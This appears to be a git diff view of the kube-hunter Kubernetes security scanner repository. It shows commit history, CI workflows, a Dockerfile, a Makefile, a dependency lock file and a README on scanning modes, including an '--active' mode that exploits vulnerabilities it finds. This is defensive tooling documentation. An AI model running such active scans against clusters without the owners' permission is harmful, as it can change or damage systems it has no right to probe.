2019-06-11 17:49:59 +03:00
danielsagi
ec3aca9547 Merge branch 'master' into insecure_port 2019-06-11 17:43:14 +03:00
Daniel Sagi
faf1db3d16 cleaned files to match master branch updates, also removed change of ExposedRunHandler evidence handling 2019-06-11 17:40:44 +03:00
Daniel Sagi
2168180ffb fixed issue with get_random_pod method, .next attribute on generator is deprecated in python3 2019-06-11 11:29:39 +03:00
danielsagi
079062573e Merge pull request #133 from nshauli/add_counter_to_privileged_container_evidence
Add evidence counter to privileged container vulnerability
2019-06-05 11:56:48 +03:00
nshauli
ac77c67ddd Add evidence counter to privileged container vulnerability 2019-06-05 11:48:25 +03:00
danielsagi
0f4ddc9987 Merge pull request #132 from aquasecurity/add_environment_markers
changed enum34 to be installed only under python version 3.4
2019-06-03 20:45:03 +03:00
Daniel Sagi
9204d34244 changed enum34 to be installed only under python version 3.4 2019-06-03 20:16:39 +03:00
danielsagi
9629292ef8 Merge pull request #130 from nshauli/add_hunter_name_to_vulnerability
Add hunter name to each event and each reported vulnerability
2019-06-03 16:26:56 +03:00
nshauli
f5c54428f8 Add hunter name to each event and to each vulnrability in json and yaml report 2019-06-03 16:17:33 +03:00
Liz Rice
1143b89332 Merge branch 'master' into insecure_port 2019-05-30 23:26:16 +01:00
Liz Rice
b60cdf2043 Merge pull request #128 from DrMurx/more_secure_cloudip_detection
Access cloud IP detection service via HTTPS
2019-05-30 23:24:31 +01:00
Liz Rice
8fad9dd2ac Merge branch 'master' into more_secure_cloudip_detection 2019-05-30 23:20:41 +01:00
danielsagi
c6673869d7 Merge pull request #129 from aquasecurity/add_enum_to_requirements
added enum34 to requirements.txt
2019-05-25 20:43:55 +03:00
Daniel Sagi
55ed8d0a80 added enum34 to requirements.txt 2019-05-25 20:00:55 +03:00
Jan Kunzmann
0f3670dff5 Access cloud IP detection service via HTTPS 2019-05-23 13:03:18 +02:00
danielsagi
e69e591fab Merge pull request #125 from aquarnd/hunter_statistics_should_count_vulnerabilities_only
1. Change hunter statistics to count vulnerabilities only.
2019-05-21 19:12:13 +03:00
nshauli
ac7027dab6 1. Change hunter statistics to count vulnerabilities only.
2. Add --statistics flag support.
3. Show hunter statistics only if --statistics was set.
4. Few infrastructure improvements.
2019-05-20 21:32:52 +03:00
Liz Rice
d7014fd06d Merge pull request #121 from tomek-bt/update-readme-for-non-ssh
Update README to reference non-SSH URL
2019-05-18 09:44:44 +01:00
Tomek Rabczak
e536f53b88 Update README to reference non-SSH URL 2019-05-17 17:44:42 +00:00
Liz Rice
f7eccca55d Merge pull request #119 from aquasecurity/security-fix
CVE-2019-11324
2019-05-14 15:23:44 +01:00
Liz Rice
d6f76dc295 CVE-2019-11324 2019-05-14 15:15:11 +01:00
Liz Rice
229ff40a01 Fix bad merge
And a typo while I'm here
2019-05-14 14:07:33 +01:00
Liz Rice
7d038f50dc Merge branch 'master' into insecure_port 2019-05-14 12:00:51 +01:00
Liz Rice
c860406075 Merge pull request #116 from aquarnd/add_suppport_for_hunters_list
Add support for hunters list as part of the reports.
2019-05-14 11:55:40 +01:00
nshauli
b4df6b5298 Add support for hunters list as part of the reports.
Each reported hunter includes name, description and number of events.
Add severity field to each vulnerability report.
2019-05-14 12:44:30 +03:00
Liz Rice
50dfbd0daa Update requirements.txt 2019-05-13 13:52:51 +01:00
Liz Rice
5cf68a318f Tests for insecure port access 2019-05-13 13:18:03 +01:00
Liz Rice
fd5ed8a166 .gitignore additions 2019-05-13 12:26:22 +01:00
Liz Rice
1db39fd966 Include evidence on exposed run handler 2019-05-13 12:24:28 +01:00
Liz Rice
bfb14e229a Combine two debug messages, for clarity 2019-05-13 12:23:53 +01:00
Liz Rice
da832df36d Test for insecure port being open on port 8080 2019-05-13 12:23:23 +01:00
161 changed files with 8374 additions and 2783 deletions

4
.dockerignore Normal file
View File

@@ -0,0 +1,4 @@
*.png
tests/
docs/
.github/

6
.flake8 Normal file
View File

@@ -0,0 +1,6 @@
[flake8]
ignore = E203, E266, E501, W503, B903, T499
max-line-length = 120
max-complexity = 18
select = B,C,E,F,W,B9,T4
mypy_config=mypy.ini

17
.github/ISSUE_TEMPLATE/bug_report.md vendored Normal file
View File

@@ -0,0 +1,17 @@
---
name: Bug report
about: I would like to report a bug within the project
labels: bug
---
### What happened
<!---
Please explain in detail steps you took and what happened.
-->
### Expected behavior
<!---
What should happen, ideally?
-->

View File

@@ -0,0 +1,17 @@
---
name: Feature Request
about: I have a suggestion (and might want to implement myself)
labels: enhancement
---
## What would you like to be added
<!---
Please describe the idea you have and the problem you are trying to solve.
-->
## Why is this needed
<!---
Please explain why is this feature needed and how it improves the project.
-->

View File

@@ -0,0 +1,23 @@
---
name: Support Question
about: I have a question and require assistance
labels: question
---
<!--
If you have some trouble, feel free to ask.
Make sure you're not asking duplicate question by searching on the issues lists.
-->
## What are you trying to achieve
<!--
Explain the problem you are experiencing.
-->
## Minimal example (if applicable)
<!--
If it is possible, create a minimal example of your work that showcases
the problem you are having.
-->

36
.github/PULL_REQUEST_TEMPLATE.md vendored Normal file
View File

@@ -0,0 +1,36 @@
<!---
Thank you for contributing to Aqua Security.
Please don't remove the template.
-->
## Description
Please include a summary of the change and which issue is fixed. Also include relevant motivation and context. List any dependencies that are required for this change.
## Contribution Guidelines
Please Read through the [Contribution Guidelines](https://github.com/aquasecurity/kube-hunter/blob/master/CONTRIBUTING.md).
## Fixed Issues
Please mention any issues fixed in the PR by referencing it properly in the commit message.
As per the convention, use appropriate keywords such as `fixes`, `closes`, `resolves` to automatically refer the issue.
Please consult [official github documentation](https://help.github.com/en/github/managing-your-work-on-github/closing-issues-using-keywords) for details.
Fixes #(issue)
## "BEFORE" and "AFTER" output
To verify that the change works as desired, please include an output of terminal before and after the changes under headings "BEFORE" and "AFTER".
### BEFORE
Any Terminal Output Before Changes.
### AFTER
Any Terminal Output Before Changes.
## Contribution checklist
- [ ] I have read the Contributing Guidelines.
- [ ] The commits refer to an active issue in the repository.
- [ ] I have added automated testing to cover this case.
## Notes
Please mention if you have not checked any of the above boxes.

67
.github/workflows/codeql-analysis.yml vendored Normal file
View File

@@ -0,0 +1,67 @@
# For most projects, this workflow file will not need changing; you simply need
# to commit it to your repository.
#
# You may wish to alter this file to override the set of languages analyzed,
# or to provide custom queries or build logic.
#
# ******** NOTE ********
# We have attempted to detect the languages in your repository. Please check
# the `language` matrix defined below to confirm you have the correct set of
# supported CodeQL languages.
#
name: "CodeQL"
on:
push:
branches: [ master ]
pull_request:
# The branches below must be a subset of the branches above
branches: [ master ]
schedule:
- cron: '16 3 * * 1'
jobs:
analyze:
name: Analyze
runs-on: ubuntu-latest
strategy:
fail-fast: false
matrix:
language: [ 'python' ]
# CodeQL supports [ 'cpp', 'csharp', 'go', 'java', 'javascript', 'python' ]
# Learn more:
# https://docs.github.com/en/free-pro-team@latest/github/finding-security-vulnerabilities-and-errors-in-your-code/configuring-code-scanning#changing-the-languages-that-are-analyzed
steps:
- name: Checkout repository
uses: actions/checkout@v2
# Initializes the CodeQL tools for scanning.
- name: Initialize CodeQL
uses: github/codeql-action/init@v1
with:
languages: ${{ matrix.language }}
# If you wish to specify custom queries, you can do so here or in a config file.
# By default, queries listed here will override any specified in a config file.
# Prefix the list here with "+" to use these queries and those in the config file.
# queries: ./path/to/local/query, your-org/your-repo/queries@main
# Autobuild attempts to build any compiled languages (C/C++, C#, or Java).
# If this step fails, then you should remove it and run the build manually (see below)
- name: Autobuild
uses: github/codeql-action/autobuild@v1
# Command-line programs to run using the OS shell.
# 📚 https://git.io/JvXDl
# ✏️ If the Autobuild fails above, remove it and uncomment the following three lines
# and modify them (or add more) to build your code if your project
# uses a compiled language
#- run: |
# make bootstrap
# make release
- name: Perform CodeQL Analysis
uses: github/codeql-action/analyze@v1

12
.github/workflows/lint.yml vendored Normal file
View File

@@ -0,0 +1,12 @@
name: Lint
on: [push, pull_request]
jobs:
build:
runs-on: ubuntu-20.04
steps:
- uses: actions/checkout@v2
- uses: actions/setup-python@v2
- uses: pre-commit/action@v2.0.0

52
.github/workflows/release.yml vendored Normal file
View File

@@ -0,0 +1,52 @@
on:
push:
# Sequence of patterns matched against refs/tags
tags:
- 'v*' # Push events to matching v*, i.e. v1.0, v20.15.10
name: Upload Release Asset
jobs:
build:
name: Upload Release Asset
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v2
- name: Set up Python
uses: actions/setup-python@v2
with:
python-version: '3.9'
- name: Install dependencies
run: |
python -m pip install -U pip
python -m pip install -r requirements-dev.txt
- name: Build project
shell: bash
run: |
make pyinstaller
- name: Create Release
id: create_release
uses: actions/create-release@v1
env:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
with:
tag_name: ${{ github.ref }}
release_name: Release ${{ github.ref }}
draft: false
prerelease: false
- name: Upload Release Asset
id: upload-release-asset
uses: actions/upload-release-asset@v1
env:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
with:
upload_url: ${{ steps.create_release.outputs.upload_url }}
asset_path: ./dist/kube-hunter
asset_name: kube-hunter-linux-x86_64-${{ github.ref }}
asset_content_type: application/octet-stream

54
.github/workflows/test.yml vendored Normal file
View File

@@ -0,0 +1,54 @@
name: Test
on: [push, pull_request]
env:
FORCE_COLOR: 1
jobs:
build:
runs-on: ${{ matrix.os }}
strategy:
fail-fast: false
matrix:
python-version: ["3.6", "3.7", "3.8", "3.9"]
os: [ubuntu-20.04, ubuntu-18.04, ubuntu-16.04]
steps:
- uses: actions/checkout@v2
- name: Set up Python ${{ matrix.python-version }}
uses: actions/setup-python@v2
with:
python-version: ${{ matrix.python-version }}
- name: Get pip cache dir
id: pip-cache
run: |
echo "::set-output name=dir::$(pip cache dir)"
- name: Cache
uses: actions/cache@v2
with:
path: ${{ steps.pip-cache.outputs.dir }}
key:
${{ matrix.os }}-${{ matrix.python-version }}-${{ hashFiles('requirements-dev.txt') }}
restore-keys: |
${{ matrix.os }}-${{ matrix.python-version }}-
- name: Install dependencies
run: |
python -m pip install -U pip
python -m pip install -U wheel
python -m pip install -r requirements.txt
python -m pip install -r requirements-dev.txt
- name: Test
shell: bash
run: |
make test
- name: Upload coverage
uses: codecov/codecov-action@v1
with:
name: ${{ matrix.os }} Python ${{ matrix.python-version }}

32
.gitignore vendored
View File

@@ -1,3 +1,33 @@
*.pyc
.dockerignore
.venv
*aqua*
venv/
.vscode
.coverage
.idea
# Distribution / packaging
.Python
env/
build/
develop-eggs/
dist/
downloads/
eggs/
lib/
lib64/
parts/
sdist/
var/
*.egg-info/
.installed.cfg
*.egg
*.spec
.eggs
pip-wheel-metadata
# Directory Cache Files
.DS_Store
thumbs.db
__pycache__
.mypy_cache

10
.pre-commit-config.yaml Normal file
View File

@@ -0,0 +1,10 @@
repos:
- repo: https://github.com/psf/black
rev: stable
hooks:
- id: black
- repo: https://gitlab.com/pycqa/flake8
rev: 3.7.9
hooks:
- id: flake8
additional_dependencies: [flake8-bugbear]

View File

@@ -1,26 +0,0 @@
group: travis_latest
language: python
cache: pip
matrix:
include:
- python: 2.7
#- python: 3.4
#- python: 3.5
- python: 3.6
- python: 3.7
dist: xenial # required for Python 3.7 (travis-ci/travis-ci#9069)
# sudo: required # required for Python 3.7 (travis-ci/travis-ci#9069)
install:
- pip install -r requirements.txt
- pip install flake8
before_script:
# stop the build if there are Python syntax errors or undefined names
- flake8 . --count --select=E901,E999,F821,F822,F823 --show-source --statistics
# exit-zero treats all errors as warnings. The GitHub editor is 127 chars wide
- flake8 . --count --exit-zero --max-complexity=10 --max-line-length=127 --statistics
- pip install pytest
script:
- python runtest.py
notifications:
on_success: change
on_failure: change # `always` will be the setting once code changes slow down

39
CONTRIBUTING.md Normal file
View File

@@ -0,0 +1,39 @@
## Contribution Guide
## Welcome Aboard
Thank you for taking interest in contributing to kube-hunter!
This guide will walk you through the development process of kube-hunter.
## Setting Up
kube-hunter is written in Python 3 and supports versions 3.6 and above.
You'll probably want to create a virtual environment for your local project.
Once you got your project and IDE set up, you can `make dev-deps` and start contributing!
You may also install a pre-commit hook to take care of linting - `pre-commit install`.
## Issues
- Feel free to open issues for any reason as long as you make it clear if this issue is about a bug/feature/hunter/question/comment.
- Please spend a small amount of time giving due diligence to the issue tracker. Your issue might be a duplicate. If it is, please add your comment to the existing issue.
- Remember users might be searching for your issue in the future, so please give it a meaningful title to help others.
- The issue should clearly explain the reason for opening, the proposal if you have any, and any relevant technical information.
## Pull Requests
1. Every Pull Request should have an associated Issue unless you are fixing a trivial documentation issue.
1. Your PR is more likely to be accepted if it focuses on just one change.
1. Describe what the PR does. There's no convention enforced, but please try to be concise and descriptive. Treat the PR description as a commit message. Titles that start with "fix"/"add"/"improve"/"remove" are good examples.
1. Please add the associated Issue in the PR description.
1. There's no need to add or tag reviewers.
1. If a reviewer commented on your code or asked for changes, please remember to mark the discussion as resolved after you address it. PRs with unresolved issues should not be merged (even if the comment is unclear or requires no action from your side).
1. Please include a comment with the results before and after your change.
1. Your PR is more likely to be accepted if it includes tests (We have not historically been very strict about tests, but we would like to improve this!).
## Hunters
If you are contributing a new Hunter:
1. When you open an issue to present the Hunter, please specify which `Vulnerability` classes you plan to add.
1. A maintainer will assign each `Vulnerability` a VID for you to include in your Hunter code.
1. Please add a KB article to `/docs/kb/` explaining the vulnerability and suggesting remediation steps. Look at other articles for examples.
1. Please adhere to the following types convention: Use `Hunter` class to report vulnerabilities, `ActiveHunter` if your Hunter might change the state of the cluster, and `Discovery` for scanning the cluster (all are descendants of `HunterBase`). Also, use the `Vulnerability` class to report findings, and `Service` to report a discovery to be used by a hunter (both are descendants of `Event`, refrain from using `Event` directly).

View File

@@ -1,16 +1,29 @@
FROM python:3.7.2-alpine3.9
FROM python:3.8-alpine as builder
RUN apk add --update \
RUN apk add --no-cache \
linux-headers \
build-base \
tcpdump \
wireshark
build-base \
ebtables \
make \
git && \
apk upgrade --no-cache
RUN mkdir -p /kube-hunter
COPY ./requirements.txt /kube-hunter/.
RUN pip install -r /kube-hunter/requirements.txt
COPY . /kube-hunter
WORKDIR /kube-hunter
COPY setup.py setup.cfg Makefile ./
RUN make deps
ENTRYPOINT ["python", "kube-hunter.py"]
COPY . .
RUN make install
FROM python:3.8-alpine
RUN apk add --no-cache \
tcpdump \
ebtables && \
apk upgrade --no-cache
COPY --from=builder /usr/local/lib/python3.8/site-packages /usr/local/lib/python3.8/site-packages
COPY --from=builder /usr/local/bin/kube-hunter /usr/local/bin/kube-hunter
ENTRYPOINT ["kube-hunter"]

67
Makefile Normal file
View File

@@ -0,0 +1,67 @@
.SILENT: clean
NAME := kube-hunter
SRC := kube_hunter
ENTRYPOINT := $(SRC)/__main__.py
DIST := dist
COMPILED := $(DIST)/$(NAME)
STATIC_COMPILED := $(COMPILED).static
.PHONY: deps
deps:
requires=$(shell mktemp)
python setup.py -q dependencies > \$requires
pip install -r \$requires
rm \$requires
.PHONY: dev-deps
dev-deps:
pip install -r requirements-dev.txt
.PHONY: lint
lint:
black .
flake8
.PHONY: lint-check
lint-check:
flake8
black --check --diff .
.PHONY: test
test:
pytest
.PHONY: build
build:
python setup.py sdist bdist_wheel
.PHONY: pyinstaller
pyinstaller: deps
python setup.py pyinstaller
.PHONY: staticx_deps
staticx_deps:
command -v patchelf > /dev/null 2>&1 || (echo "patchelf is not available. install it in order to use staticx" && false)
.PHONY: pyinstaller_static
pyinstaller_static: staticx_deps pyinstaller
staticx $(COMPILED) $(STATIC_COMPILED)
.PHONY: install
install:
pip install .
.PHONY: uninstall
uninstall:
pip uninstall $(NAME)
.PHONY: publish
publish:
twine upload dist/*
.PHONY: clean
clean:
rm -rf build/ dist/ *.egg-info/ .eggs/ .pytest_cache/ .mypy_cache .coverage *.spec
find . -type d -name __pycache__ -exec rm -rf '{}' +

136
README.md
View File

@@ -1,116 +1,182 @@
![kube-hunter](https://github.com/aquasecurity/kube-hunter/blob/master/kube-hunter.png)
[![Build Status](https://travis-ci.org/aquasecurity/kube-hunter.svg?branch=master)](https://travis-ci.org/aquasecurity/kube-hunter)
[![Build Status](https://github.com/aquasecurity/kube-hunter/workflows/Test/badge.svg)](https://github.com/aquasecurity/kube-hunter/actions)
[![codecov](https://codecov.io/gh/aquasecurity/kube-hunter/branch/master/graph/badge.svg)](https://codecov.io/gh/aquasecurity/kube-hunter)
[![Code style: black](https://img.shields.io/badge/code%20style-black-000000.svg)](https://github.com/psf/black)
[![License](https://img.shields.io/github/license/aquasecurity/kube-hunter)](https://github.com/aquasecurity/kube-hunter/blob/master/LICENSE)
[![Docker image](https://images.microbadger.com/badges/image/aquasec/kube-hunter.svg)](https://microbadger.com/images/aquasec/kube-hunter "Get your own image badge on microbadger.com")
Kube-hunter hunts for security weaknesses in Kubernetes clusters. The tool was developed to increase awareness and visibility for security issues in Kubernetes environments. **You should NOT run kube-hunter on a Kubernetes cluster you don't own!**
**Run kube-hunter**: kube-hunter is available as a container (aquasec/kube-hunter), and we also offer a web site at [kube-hunter.aquasec.com](https://kube-hunter.aquasec.com) where you can register online to receive a token allowing you see and share the results online. You can also run the Python code yourself as described below.
**Contribute**: We welcome contributions, especially new hunter modules that perform additional tests. If you would like to develop your own modules please read [Guidelines For Developing Your First kube-hunter Module](src/README.md).
kube-hunter hunts for security weaknesses in Kubernetes clusters. The tool was developed to increase awareness and visibility for security issues in Kubernetes environments. **You should NOT run kube-hunter on a Kubernetes cluster that you don't own!**
**Run kube-hunter**: kube-hunter is available as a container (aquasec/kube-hunter), and we also offer a web site at [kube-hunter.aquasec.com](https://kube-hunter.aquasec.com) where you can register online to receive a token allowing you to see and share the results online. You can also run the Python code yourself as described below.
**Explore vulnerabilities**: The kube-hunter knowledge base includes articles about discoverable vulnerabilities and issues. When kube-hunter reports an issue, it will show its VID (Vulnerability ID) so you can look it up in the KB at https://aquasecurity.github.io/kube-hunter/
**Contribute**: We welcome contributions, especially new hunter modules that perform additional tests. If you would like to develop your modules please read [Guidelines For Developing Your First kube-hunter Module](https://github.com/aquasecurity/kube-hunter/blob/master/CONTRIBUTING.md).
[![kube-hunter demo video](https://github.com/aquasecurity/kube-hunter/blob/master/kube-hunter-screenshot.png)](https://youtu.be/s2-6rTkH8a8?t=57s)
Table of Contents
=================
* [Hunting](#hunting)
* [Where should I run kube-hunter?](#where-should-i-run-kube-hunter)
* [Scanning options](#scanning-options)
* [Active Hunting](#active-hunting)
* [List of tests](#list-of-tests)
* [Nodes Mapping](#nodes-mapping)
* [Output](#output)
* [Dispatching](#dispatching)
* [Deployment](#deployment)
* [On Machine](#on-machine)
* [Prerequisites](#prerequisites)
* [Container](#container)
* [Pod](#pod)
* [Contribution](#contribution)
## Hunting
### Where should I run kube-hunter?
There are three different ways to run kube-hunter, each providing a different approach to detecting weaknesses in your cluster:
Run kube-hunter on any machine (including your laptop), select Remote scanning and give the IP address or domain name of your Kubernetes cluster. This will give you an attackers-eye-view of your Kubernetes setup.
You can run kube-hunter directly on a machine in the cluster, and select the option to probe all the local network interfaces.
You can also run kube-hunter in a pod within the cluster. This gives an indication of how exposed your cluster would be in the event that one of your application pods is compromised (through a software vulnerability, for example).
You can also run kube-hunter in a pod within the cluster. This indicates how exposed your cluster would be if one of your application pods is compromised (through a software vulnerability, for example).
### Scanning options
First check the **[pre-requisites](#prerequisites)**
First check for these **[pre-requisites](#prerequisites)**.
By default, kube-hunter will open an interactive session, in which you will be able to select one of the following scan options. You can also specify the scan option manually from the command line. These are your options:
1. **Remote scanning**
To specify remote machines for hunting, select option 1 or use the `--remote` option. Example:
`./kube-hunter.py --remote some.node.com`
2. **Internal scanning**
To specify internal scanning, you can use the `--internal` option. (this will scan all of the machine's network interfaces) Example:
`./kube-hunter.py --internal`
To specify remote machines for hunting, select option 1 or use the `--remote` option. Example:
`kube-hunter --remote some.node.com`
2. **Interface scanning**
To specify interface scanning, you can use the `--interface` option (this will scan all of the machine's network interfaces). Example:
`kube-hunter --interface`
3. **Network scanning**
To specify a specific CIDR to scan, use the `--cidr` option. Example:
`./kube-hunter.py --cidr 192.168.0.0/24`
`kube-hunter --cidr 192.168.0.0/24`
### Active Hunting
Active hunting is an option in which kube-hunter will exploit vulnerabilities it finds, in order to explore for further vulnerabilities.
The main difference between normal and active hunting is that a normal hunt will never change state of the cluster, while active hunting can potentially do state-changing operations on the cluster, **which could be harmful**.
Active hunting is an option in which kube-hunter will exploit vulnerabilities it finds, to explore for further vulnerabilities.
The main difference between normal and active hunting is that a normal hunt will never change the state of the cluster, while active hunting can potentially do state-changing operations on the cluster, **which could be harmful**.
By default, kube-hunter does not do active hunting. To active hunt a cluster, use the `--active` flag. Example:
`./kube-hunter.py --remote some.domain.com --active`
`kube-hunter --remote some.domain.com --active`
### List of tests
You can see the list of tests with the `--list` option: Example:
`./kube-hunter.py --list`
`kube-hunter --list`
To see active hunting tests as well as passive:
`./kube-hunter.py --list --active`
`kube-hunter --list --active`
### Nodes Mapping
To see only a mapping of your nodes network, run with `--mapping` option. Example:
`kube-hunter --cidr 192.168.0.0/24 --mapping`
This will output all the Kubernetes nodes kube-hunter has found.
### Output
To control logging, you can specify a log level, using the `--log` option. Example:
`./kube-hunter.py --active --log WARNING`
`kube-hunter --active --log WARNING`
Available log levels are:
* DEBUG
* INFO (default)
* WARNING
To see only a mapping of your nodes network, run with `--mapping` option. Example:
`./kube-hunter.py --cidr 192.168.0.0/24 --mapping`
This will output all the Kubernetes nodes kube-hunter has found.
### Dispatching
By default, the report will be dispatched to `stdout`, but you can specify different methods by using the `--dispatch` option. Example:
`kube-hunter --report json --dispatch http`
Available dispatch methods are:
* stdout (default)
* http (to configure, set the following environment variables:)
* KUBEHUNTER_HTTP_DISPATCH_URL (defaults to: https://localhost)
* KUBEHUNTER_HTTP_DISPATCH_METHOD (defaults to: POST)
## Deployment
There are three methods for deploying kube-hunter:
### On Machine
You can run the kube-hunter python code directly on your machine.
You can run kube-hunter directly on your machine.
#### Prerequisites
You will need the following installed:
* python 2.7 or python 3.x
* python 3.x
* pip
Clone the repository:
##### Install with pip
Install:
~~~
git clone git@github.com:aquasecurity/kube-hunter.git
pip install kube-hunter
~~~
Install module dependencies:
Run:
~~~
kube-hunter
~~~
##### Run from source
Clone the repository:
~~~
git clone https://github.com/aquasecurity/kube-hunter.git
~~~
Install module dependencies. (You may prefer to do this within a [Virtual Environment](https://packaging.python.org/guides/installing-using-pip-and-virtual-environments/))
~~~
cd ./kube-hunter
pip install -r requirements.txt
~~~
Run:
`./kube-hunter.py`
~~~
python3 kube_hunter
~~~
_If you want to use pyinstaller/py2exe you need to first run the install_imports.py script._
### Container
Aqua Security maintains a containerised version of kube-hunter at `aquasec/kube-hunter`. _(Please note this is not currently up to date due to an issue in an underlying dependency that is [blocking the automated build](https://github.com/aquasecurity/kube-hunter/issues/112))_. This container includes this source code, plus an additional (closed source) reporting plugin for uploading results into a report that can be viewed at [kube-hunter.aquasec.com](https://kube-hunter.aquasec.com). Please note that running the `aquasec/kube-hunter` container and uploading reports data are subject to additional [terms and conditions](https://kube-hunter.aquasec.com/eula.html).
Aqua Security maintains a containerized version of kube-hunter at `aquasec/kube-hunter`. This container includes this source code, plus an additional (closed source) reporting plugin for uploading results into a report that can be viewed at [kube-hunter.aquasec.com](https://kube-hunter.aquasec.com). Please note, that running the `aquasec/kube-hunter` container and uploading reports data are subject to additional [terms and conditions](https://kube-hunter.aquasec.com/eula.html).
The Dockerfile in this repository allows you to build a containerised version without the reporting plugin.
The Dockerfile in this repository allows you to build a containerized version without the reporting plugin.
If you run the kube-hunter container with the host network it will be able to probe all the interfaces on the host:
If you run kube-hunter container with the host network, it will be able to probe all the interfaces on the host:
`docker run -it --rm --network host aquasec/kube-hunter`
_Note for Docker for Mac/Windows:_ Be aware that the "host" for Docker for Mac or Windows is the VM which Docker runs containers within. Therefore specifying `--network host` allows kube-hunter access to the network interfaces of that VM, rather than those of your machine.
By default kube-hunter runs in interactive mode. You can also specify the scanning option with the parameters described above e.g.
_Note for Docker for Mac/Windows:_ Be aware that the "host" for Docker for Mac or Windows is the VM that Docker runs containers within. Therefore specifying `--network host` allows kube-hunter access to the network interfaces of that VM, rather than those of your machine.
By default, kube-hunter runs in interactive mode. You can also specify the scanning option with the parameters described above e.g.
`docker run --rm aquasec/kube-hunter --cidr 192.168.0.0/24`
### Pod
This option lets you discover what running a malicious container can do/discover on your cluster. This gives a perspective on what an attacker could do if they were able to compromise a pod, perhaps through a software vulnerability. This may reveal significantly more vulnerabilities.
The `job.yaml` file defines a Job that will run kube-hunter in a pod, using default Kubernetes pod access settings.
* Run the job with `kubectl create` with that yaml file.
The example `job.yaml` file defines a Job that will run kube-hunter in a pod, using default Kubernetes pod access settings. (You may wish to modify this definition, for example to run as a non-root user, or to run in a different namespace.)
* Run the job with `kubectl create -f ./job.yaml`
* Find the pod name with `kubectl describe job kube-hunter`
* View the test results with `kubectl logs <pod name>`
_Please note you may wish to build your own version of the container and update job.yaml to use it, as the image on Docker hub [is not currently up to date due to an issue in an underlying dependency](https://github.com/aquasecurity/kube-hunter/issues/112)_
## Contribution
To read the contribution guidelines, <a href="https://github.com/aquasecurity/kube-hunter/blob/master/CONTRIBUTING.md"> Click here </a>
## License
This repository is available under the [Apache License 2.0](https://github.com/aquasecurity/kube-hunter/blob/master/LICENSE).

1
docs/.gitignore vendored Normal file
View File

@@ -0,0 +1 @@
_site

3
docs/Gemfile Normal file
View File

@@ -0,0 +1,3 @@
source 'https://rubygems.org'
gem 'github-pages', group: :jekyll_plugins
gem 'jekyll-sitemap'

250
docs/Gemfile.lock Normal file
View File

@@ -0,0 +1,250 @@
GEM
remote: https://rubygems.org/
specs:
activesupport (4.2.11.1)
i18n (~> 0.7)
minitest (~> 5.1)
thread_safe (~> 0.3, >= 0.3.4)
tzinfo (~> 1.1)
addressable (2.7.0)
public_suffix (>= 2.0.2, < 5.0)
coffee-script (2.4.1)
coffee-script-source
execjs
coffee-script-source (1.11.1)
colorator (1.1.0)
commonmarker (0.17.13)
ruby-enum (~> 0.5)
concurrent-ruby (1.1.5)
dnsruby (1.61.3)
addressable (~> 2.5)
em-websocket (0.5.1)
eventmachine (>= 0.12.9)
http_parser.rb (~> 0.6.0)
ethon (0.12.0)
ffi (>= 1.3.0)
eventmachine (1.2.7)
execjs (2.7.0)
faraday (0.17.0)
multipart-post (>= 1.2, < 3)
ffi (1.11.1)
forwardable-extended (2.6.0)
gemoji (3.0.1)
github-pages (201)
activesupport (= 4.2.11.1)
github-pages-health-check (= 1.16.1)
jekyll (= 3.8.5)
jekyll-avatar (= 0.6.0)
jekyll-coffeescript (= 1.1.1)
jekyll-commonmark-ghpages (= 0.1.6)
jekyll-default-layout (= 0.1.4)
jekyll-feed (= 0.11.0)
jekyll-gist (= 1.5.0)
jekyll-github-metadata (= 2.12.1)
jekyll-mentions (= 1.4.1)
jekyll-optional-front-matter (= 0.3.0)
jekyll-paginate (= 1.1.0)
jekyll-readme-index (= 0.2.0)
jekyll-redirect-from (= 0.14.0)
jekyll-relative-links (= 0.6.0)
jekyll-remote-theme (= 0.4.0)
jekyll-sass-converter (= 1.5.2)
jekyll-seo-tag (= 2.5.0)
jekyll-sitemap (= 1.2.0)
jekyll-swiss (= 0.4.0)
jekyll-theme-architect (= 0.1.1)
jekyll-theme-cayman (= 0.1.1)
jekyll-theme-dinky (= 0.1.1)
jekyll-theme-hacker (= 0.1.1)
jekyll-theme-leap-day (= 0.1.1)
jekyll-theme-merlot (= 0.1.1)
jekyll-theme-midnight (= 0.1.1)
jekyll-theme-minimal (= 0.1.1)
jekyll-theme-modernist (= 0.1.1)
jekyll-theme-primer (= 0.5.3)
jekyll-theme-slate (= 0.1.1)
jekyll-theme-tactile (= 0.1.1)
jekyll-theme-time-machine (= 0.1.1)
jekyll-titles-from-headings (= 0.5.1)
jemoji (= 0.10.2)
kramdown (= 1.17.0)
liquid (= 4.0.0)
listen (= 3.1.5)
mercenary (~> 0.3)
minima (= 2.5.0)
nokogiri (>= 1.10.4, < 2.0)
rouge (= 3.11.0)
terminal-table (~> 1.4)
github-pages-health-check (1.16.1)
addressable (~> 2.3)
dnsruby (~> 1.60)
octokit (~> 4.0)
public_suffix (~> 3.0)
typhoeus (~> 1.3)
html-pipeline (2.12.0)
activesupport (>= 2)
nokogiri (>= 1.4)
http_parser.rb (0.6.0)
i18n (0.9.5)
concurrent-ruby (~> 1.0)
jekyll (3.8.5)
addressable (~> 2.4)
colorator (~> 1.0)
em-websocket (~> 0.5)
i18n (~> 0.7)
jekyll-sass-converter (~> 1.0)
jekyll-watch (~> 2.0)
kramdown (~> 1.14)
liquid (~> 4.0)
mercenary (~> 0.3.3)
pathutil (~> 0.9)
rouge (>= 1.7, < 4)
safe_yaml (~> 1.0)
jekyll-avatar (0.6.0)
jekyll (~> 3.0)
jekyll-coffeescript (1.1.1)
coffee-script (~> 2.2)
coffee-script-source (~> 1.11.1)
jekyll-commonmark (1.3.1)
commonmarker (~> 0.14)
jekyll (>= 3.7, < 5.0)
jekyll-commonmark-ghpages (0.1.6)
commonmarker (~> 0.17.6)
jekyll-commonmark (~> 1.2)
rouge (>= 2.0, < 4.0)
jekyll-default-layout (0.1.4)
jekyll (~> 3.0)
jekyll-feed (0.11.0)
jekyll (~> 3.3)
jekyll-gist (1.5.0)
octokit (~> 4.2)
jekyll-github-metadata (2.12.1)
jekyll (~> 3.4)
octokit (~> 4.0, != 4.4.0)
jekyll-mentions (1.4.1)
html-pipeline (~> 2.3)
jekyll (~> 3.0)
jekyll-optional-front-matter (0.3.0)
jekyll (~> 3.0)
jekyll-paginate (1.1.0)
jekyll-readme-index (0.2.0)
jekyll (~> 3.0)
jekyll-redirect-from (0.14.0)
jekyll (~> 3.3)
jekyll-relative-links (0.6.0)
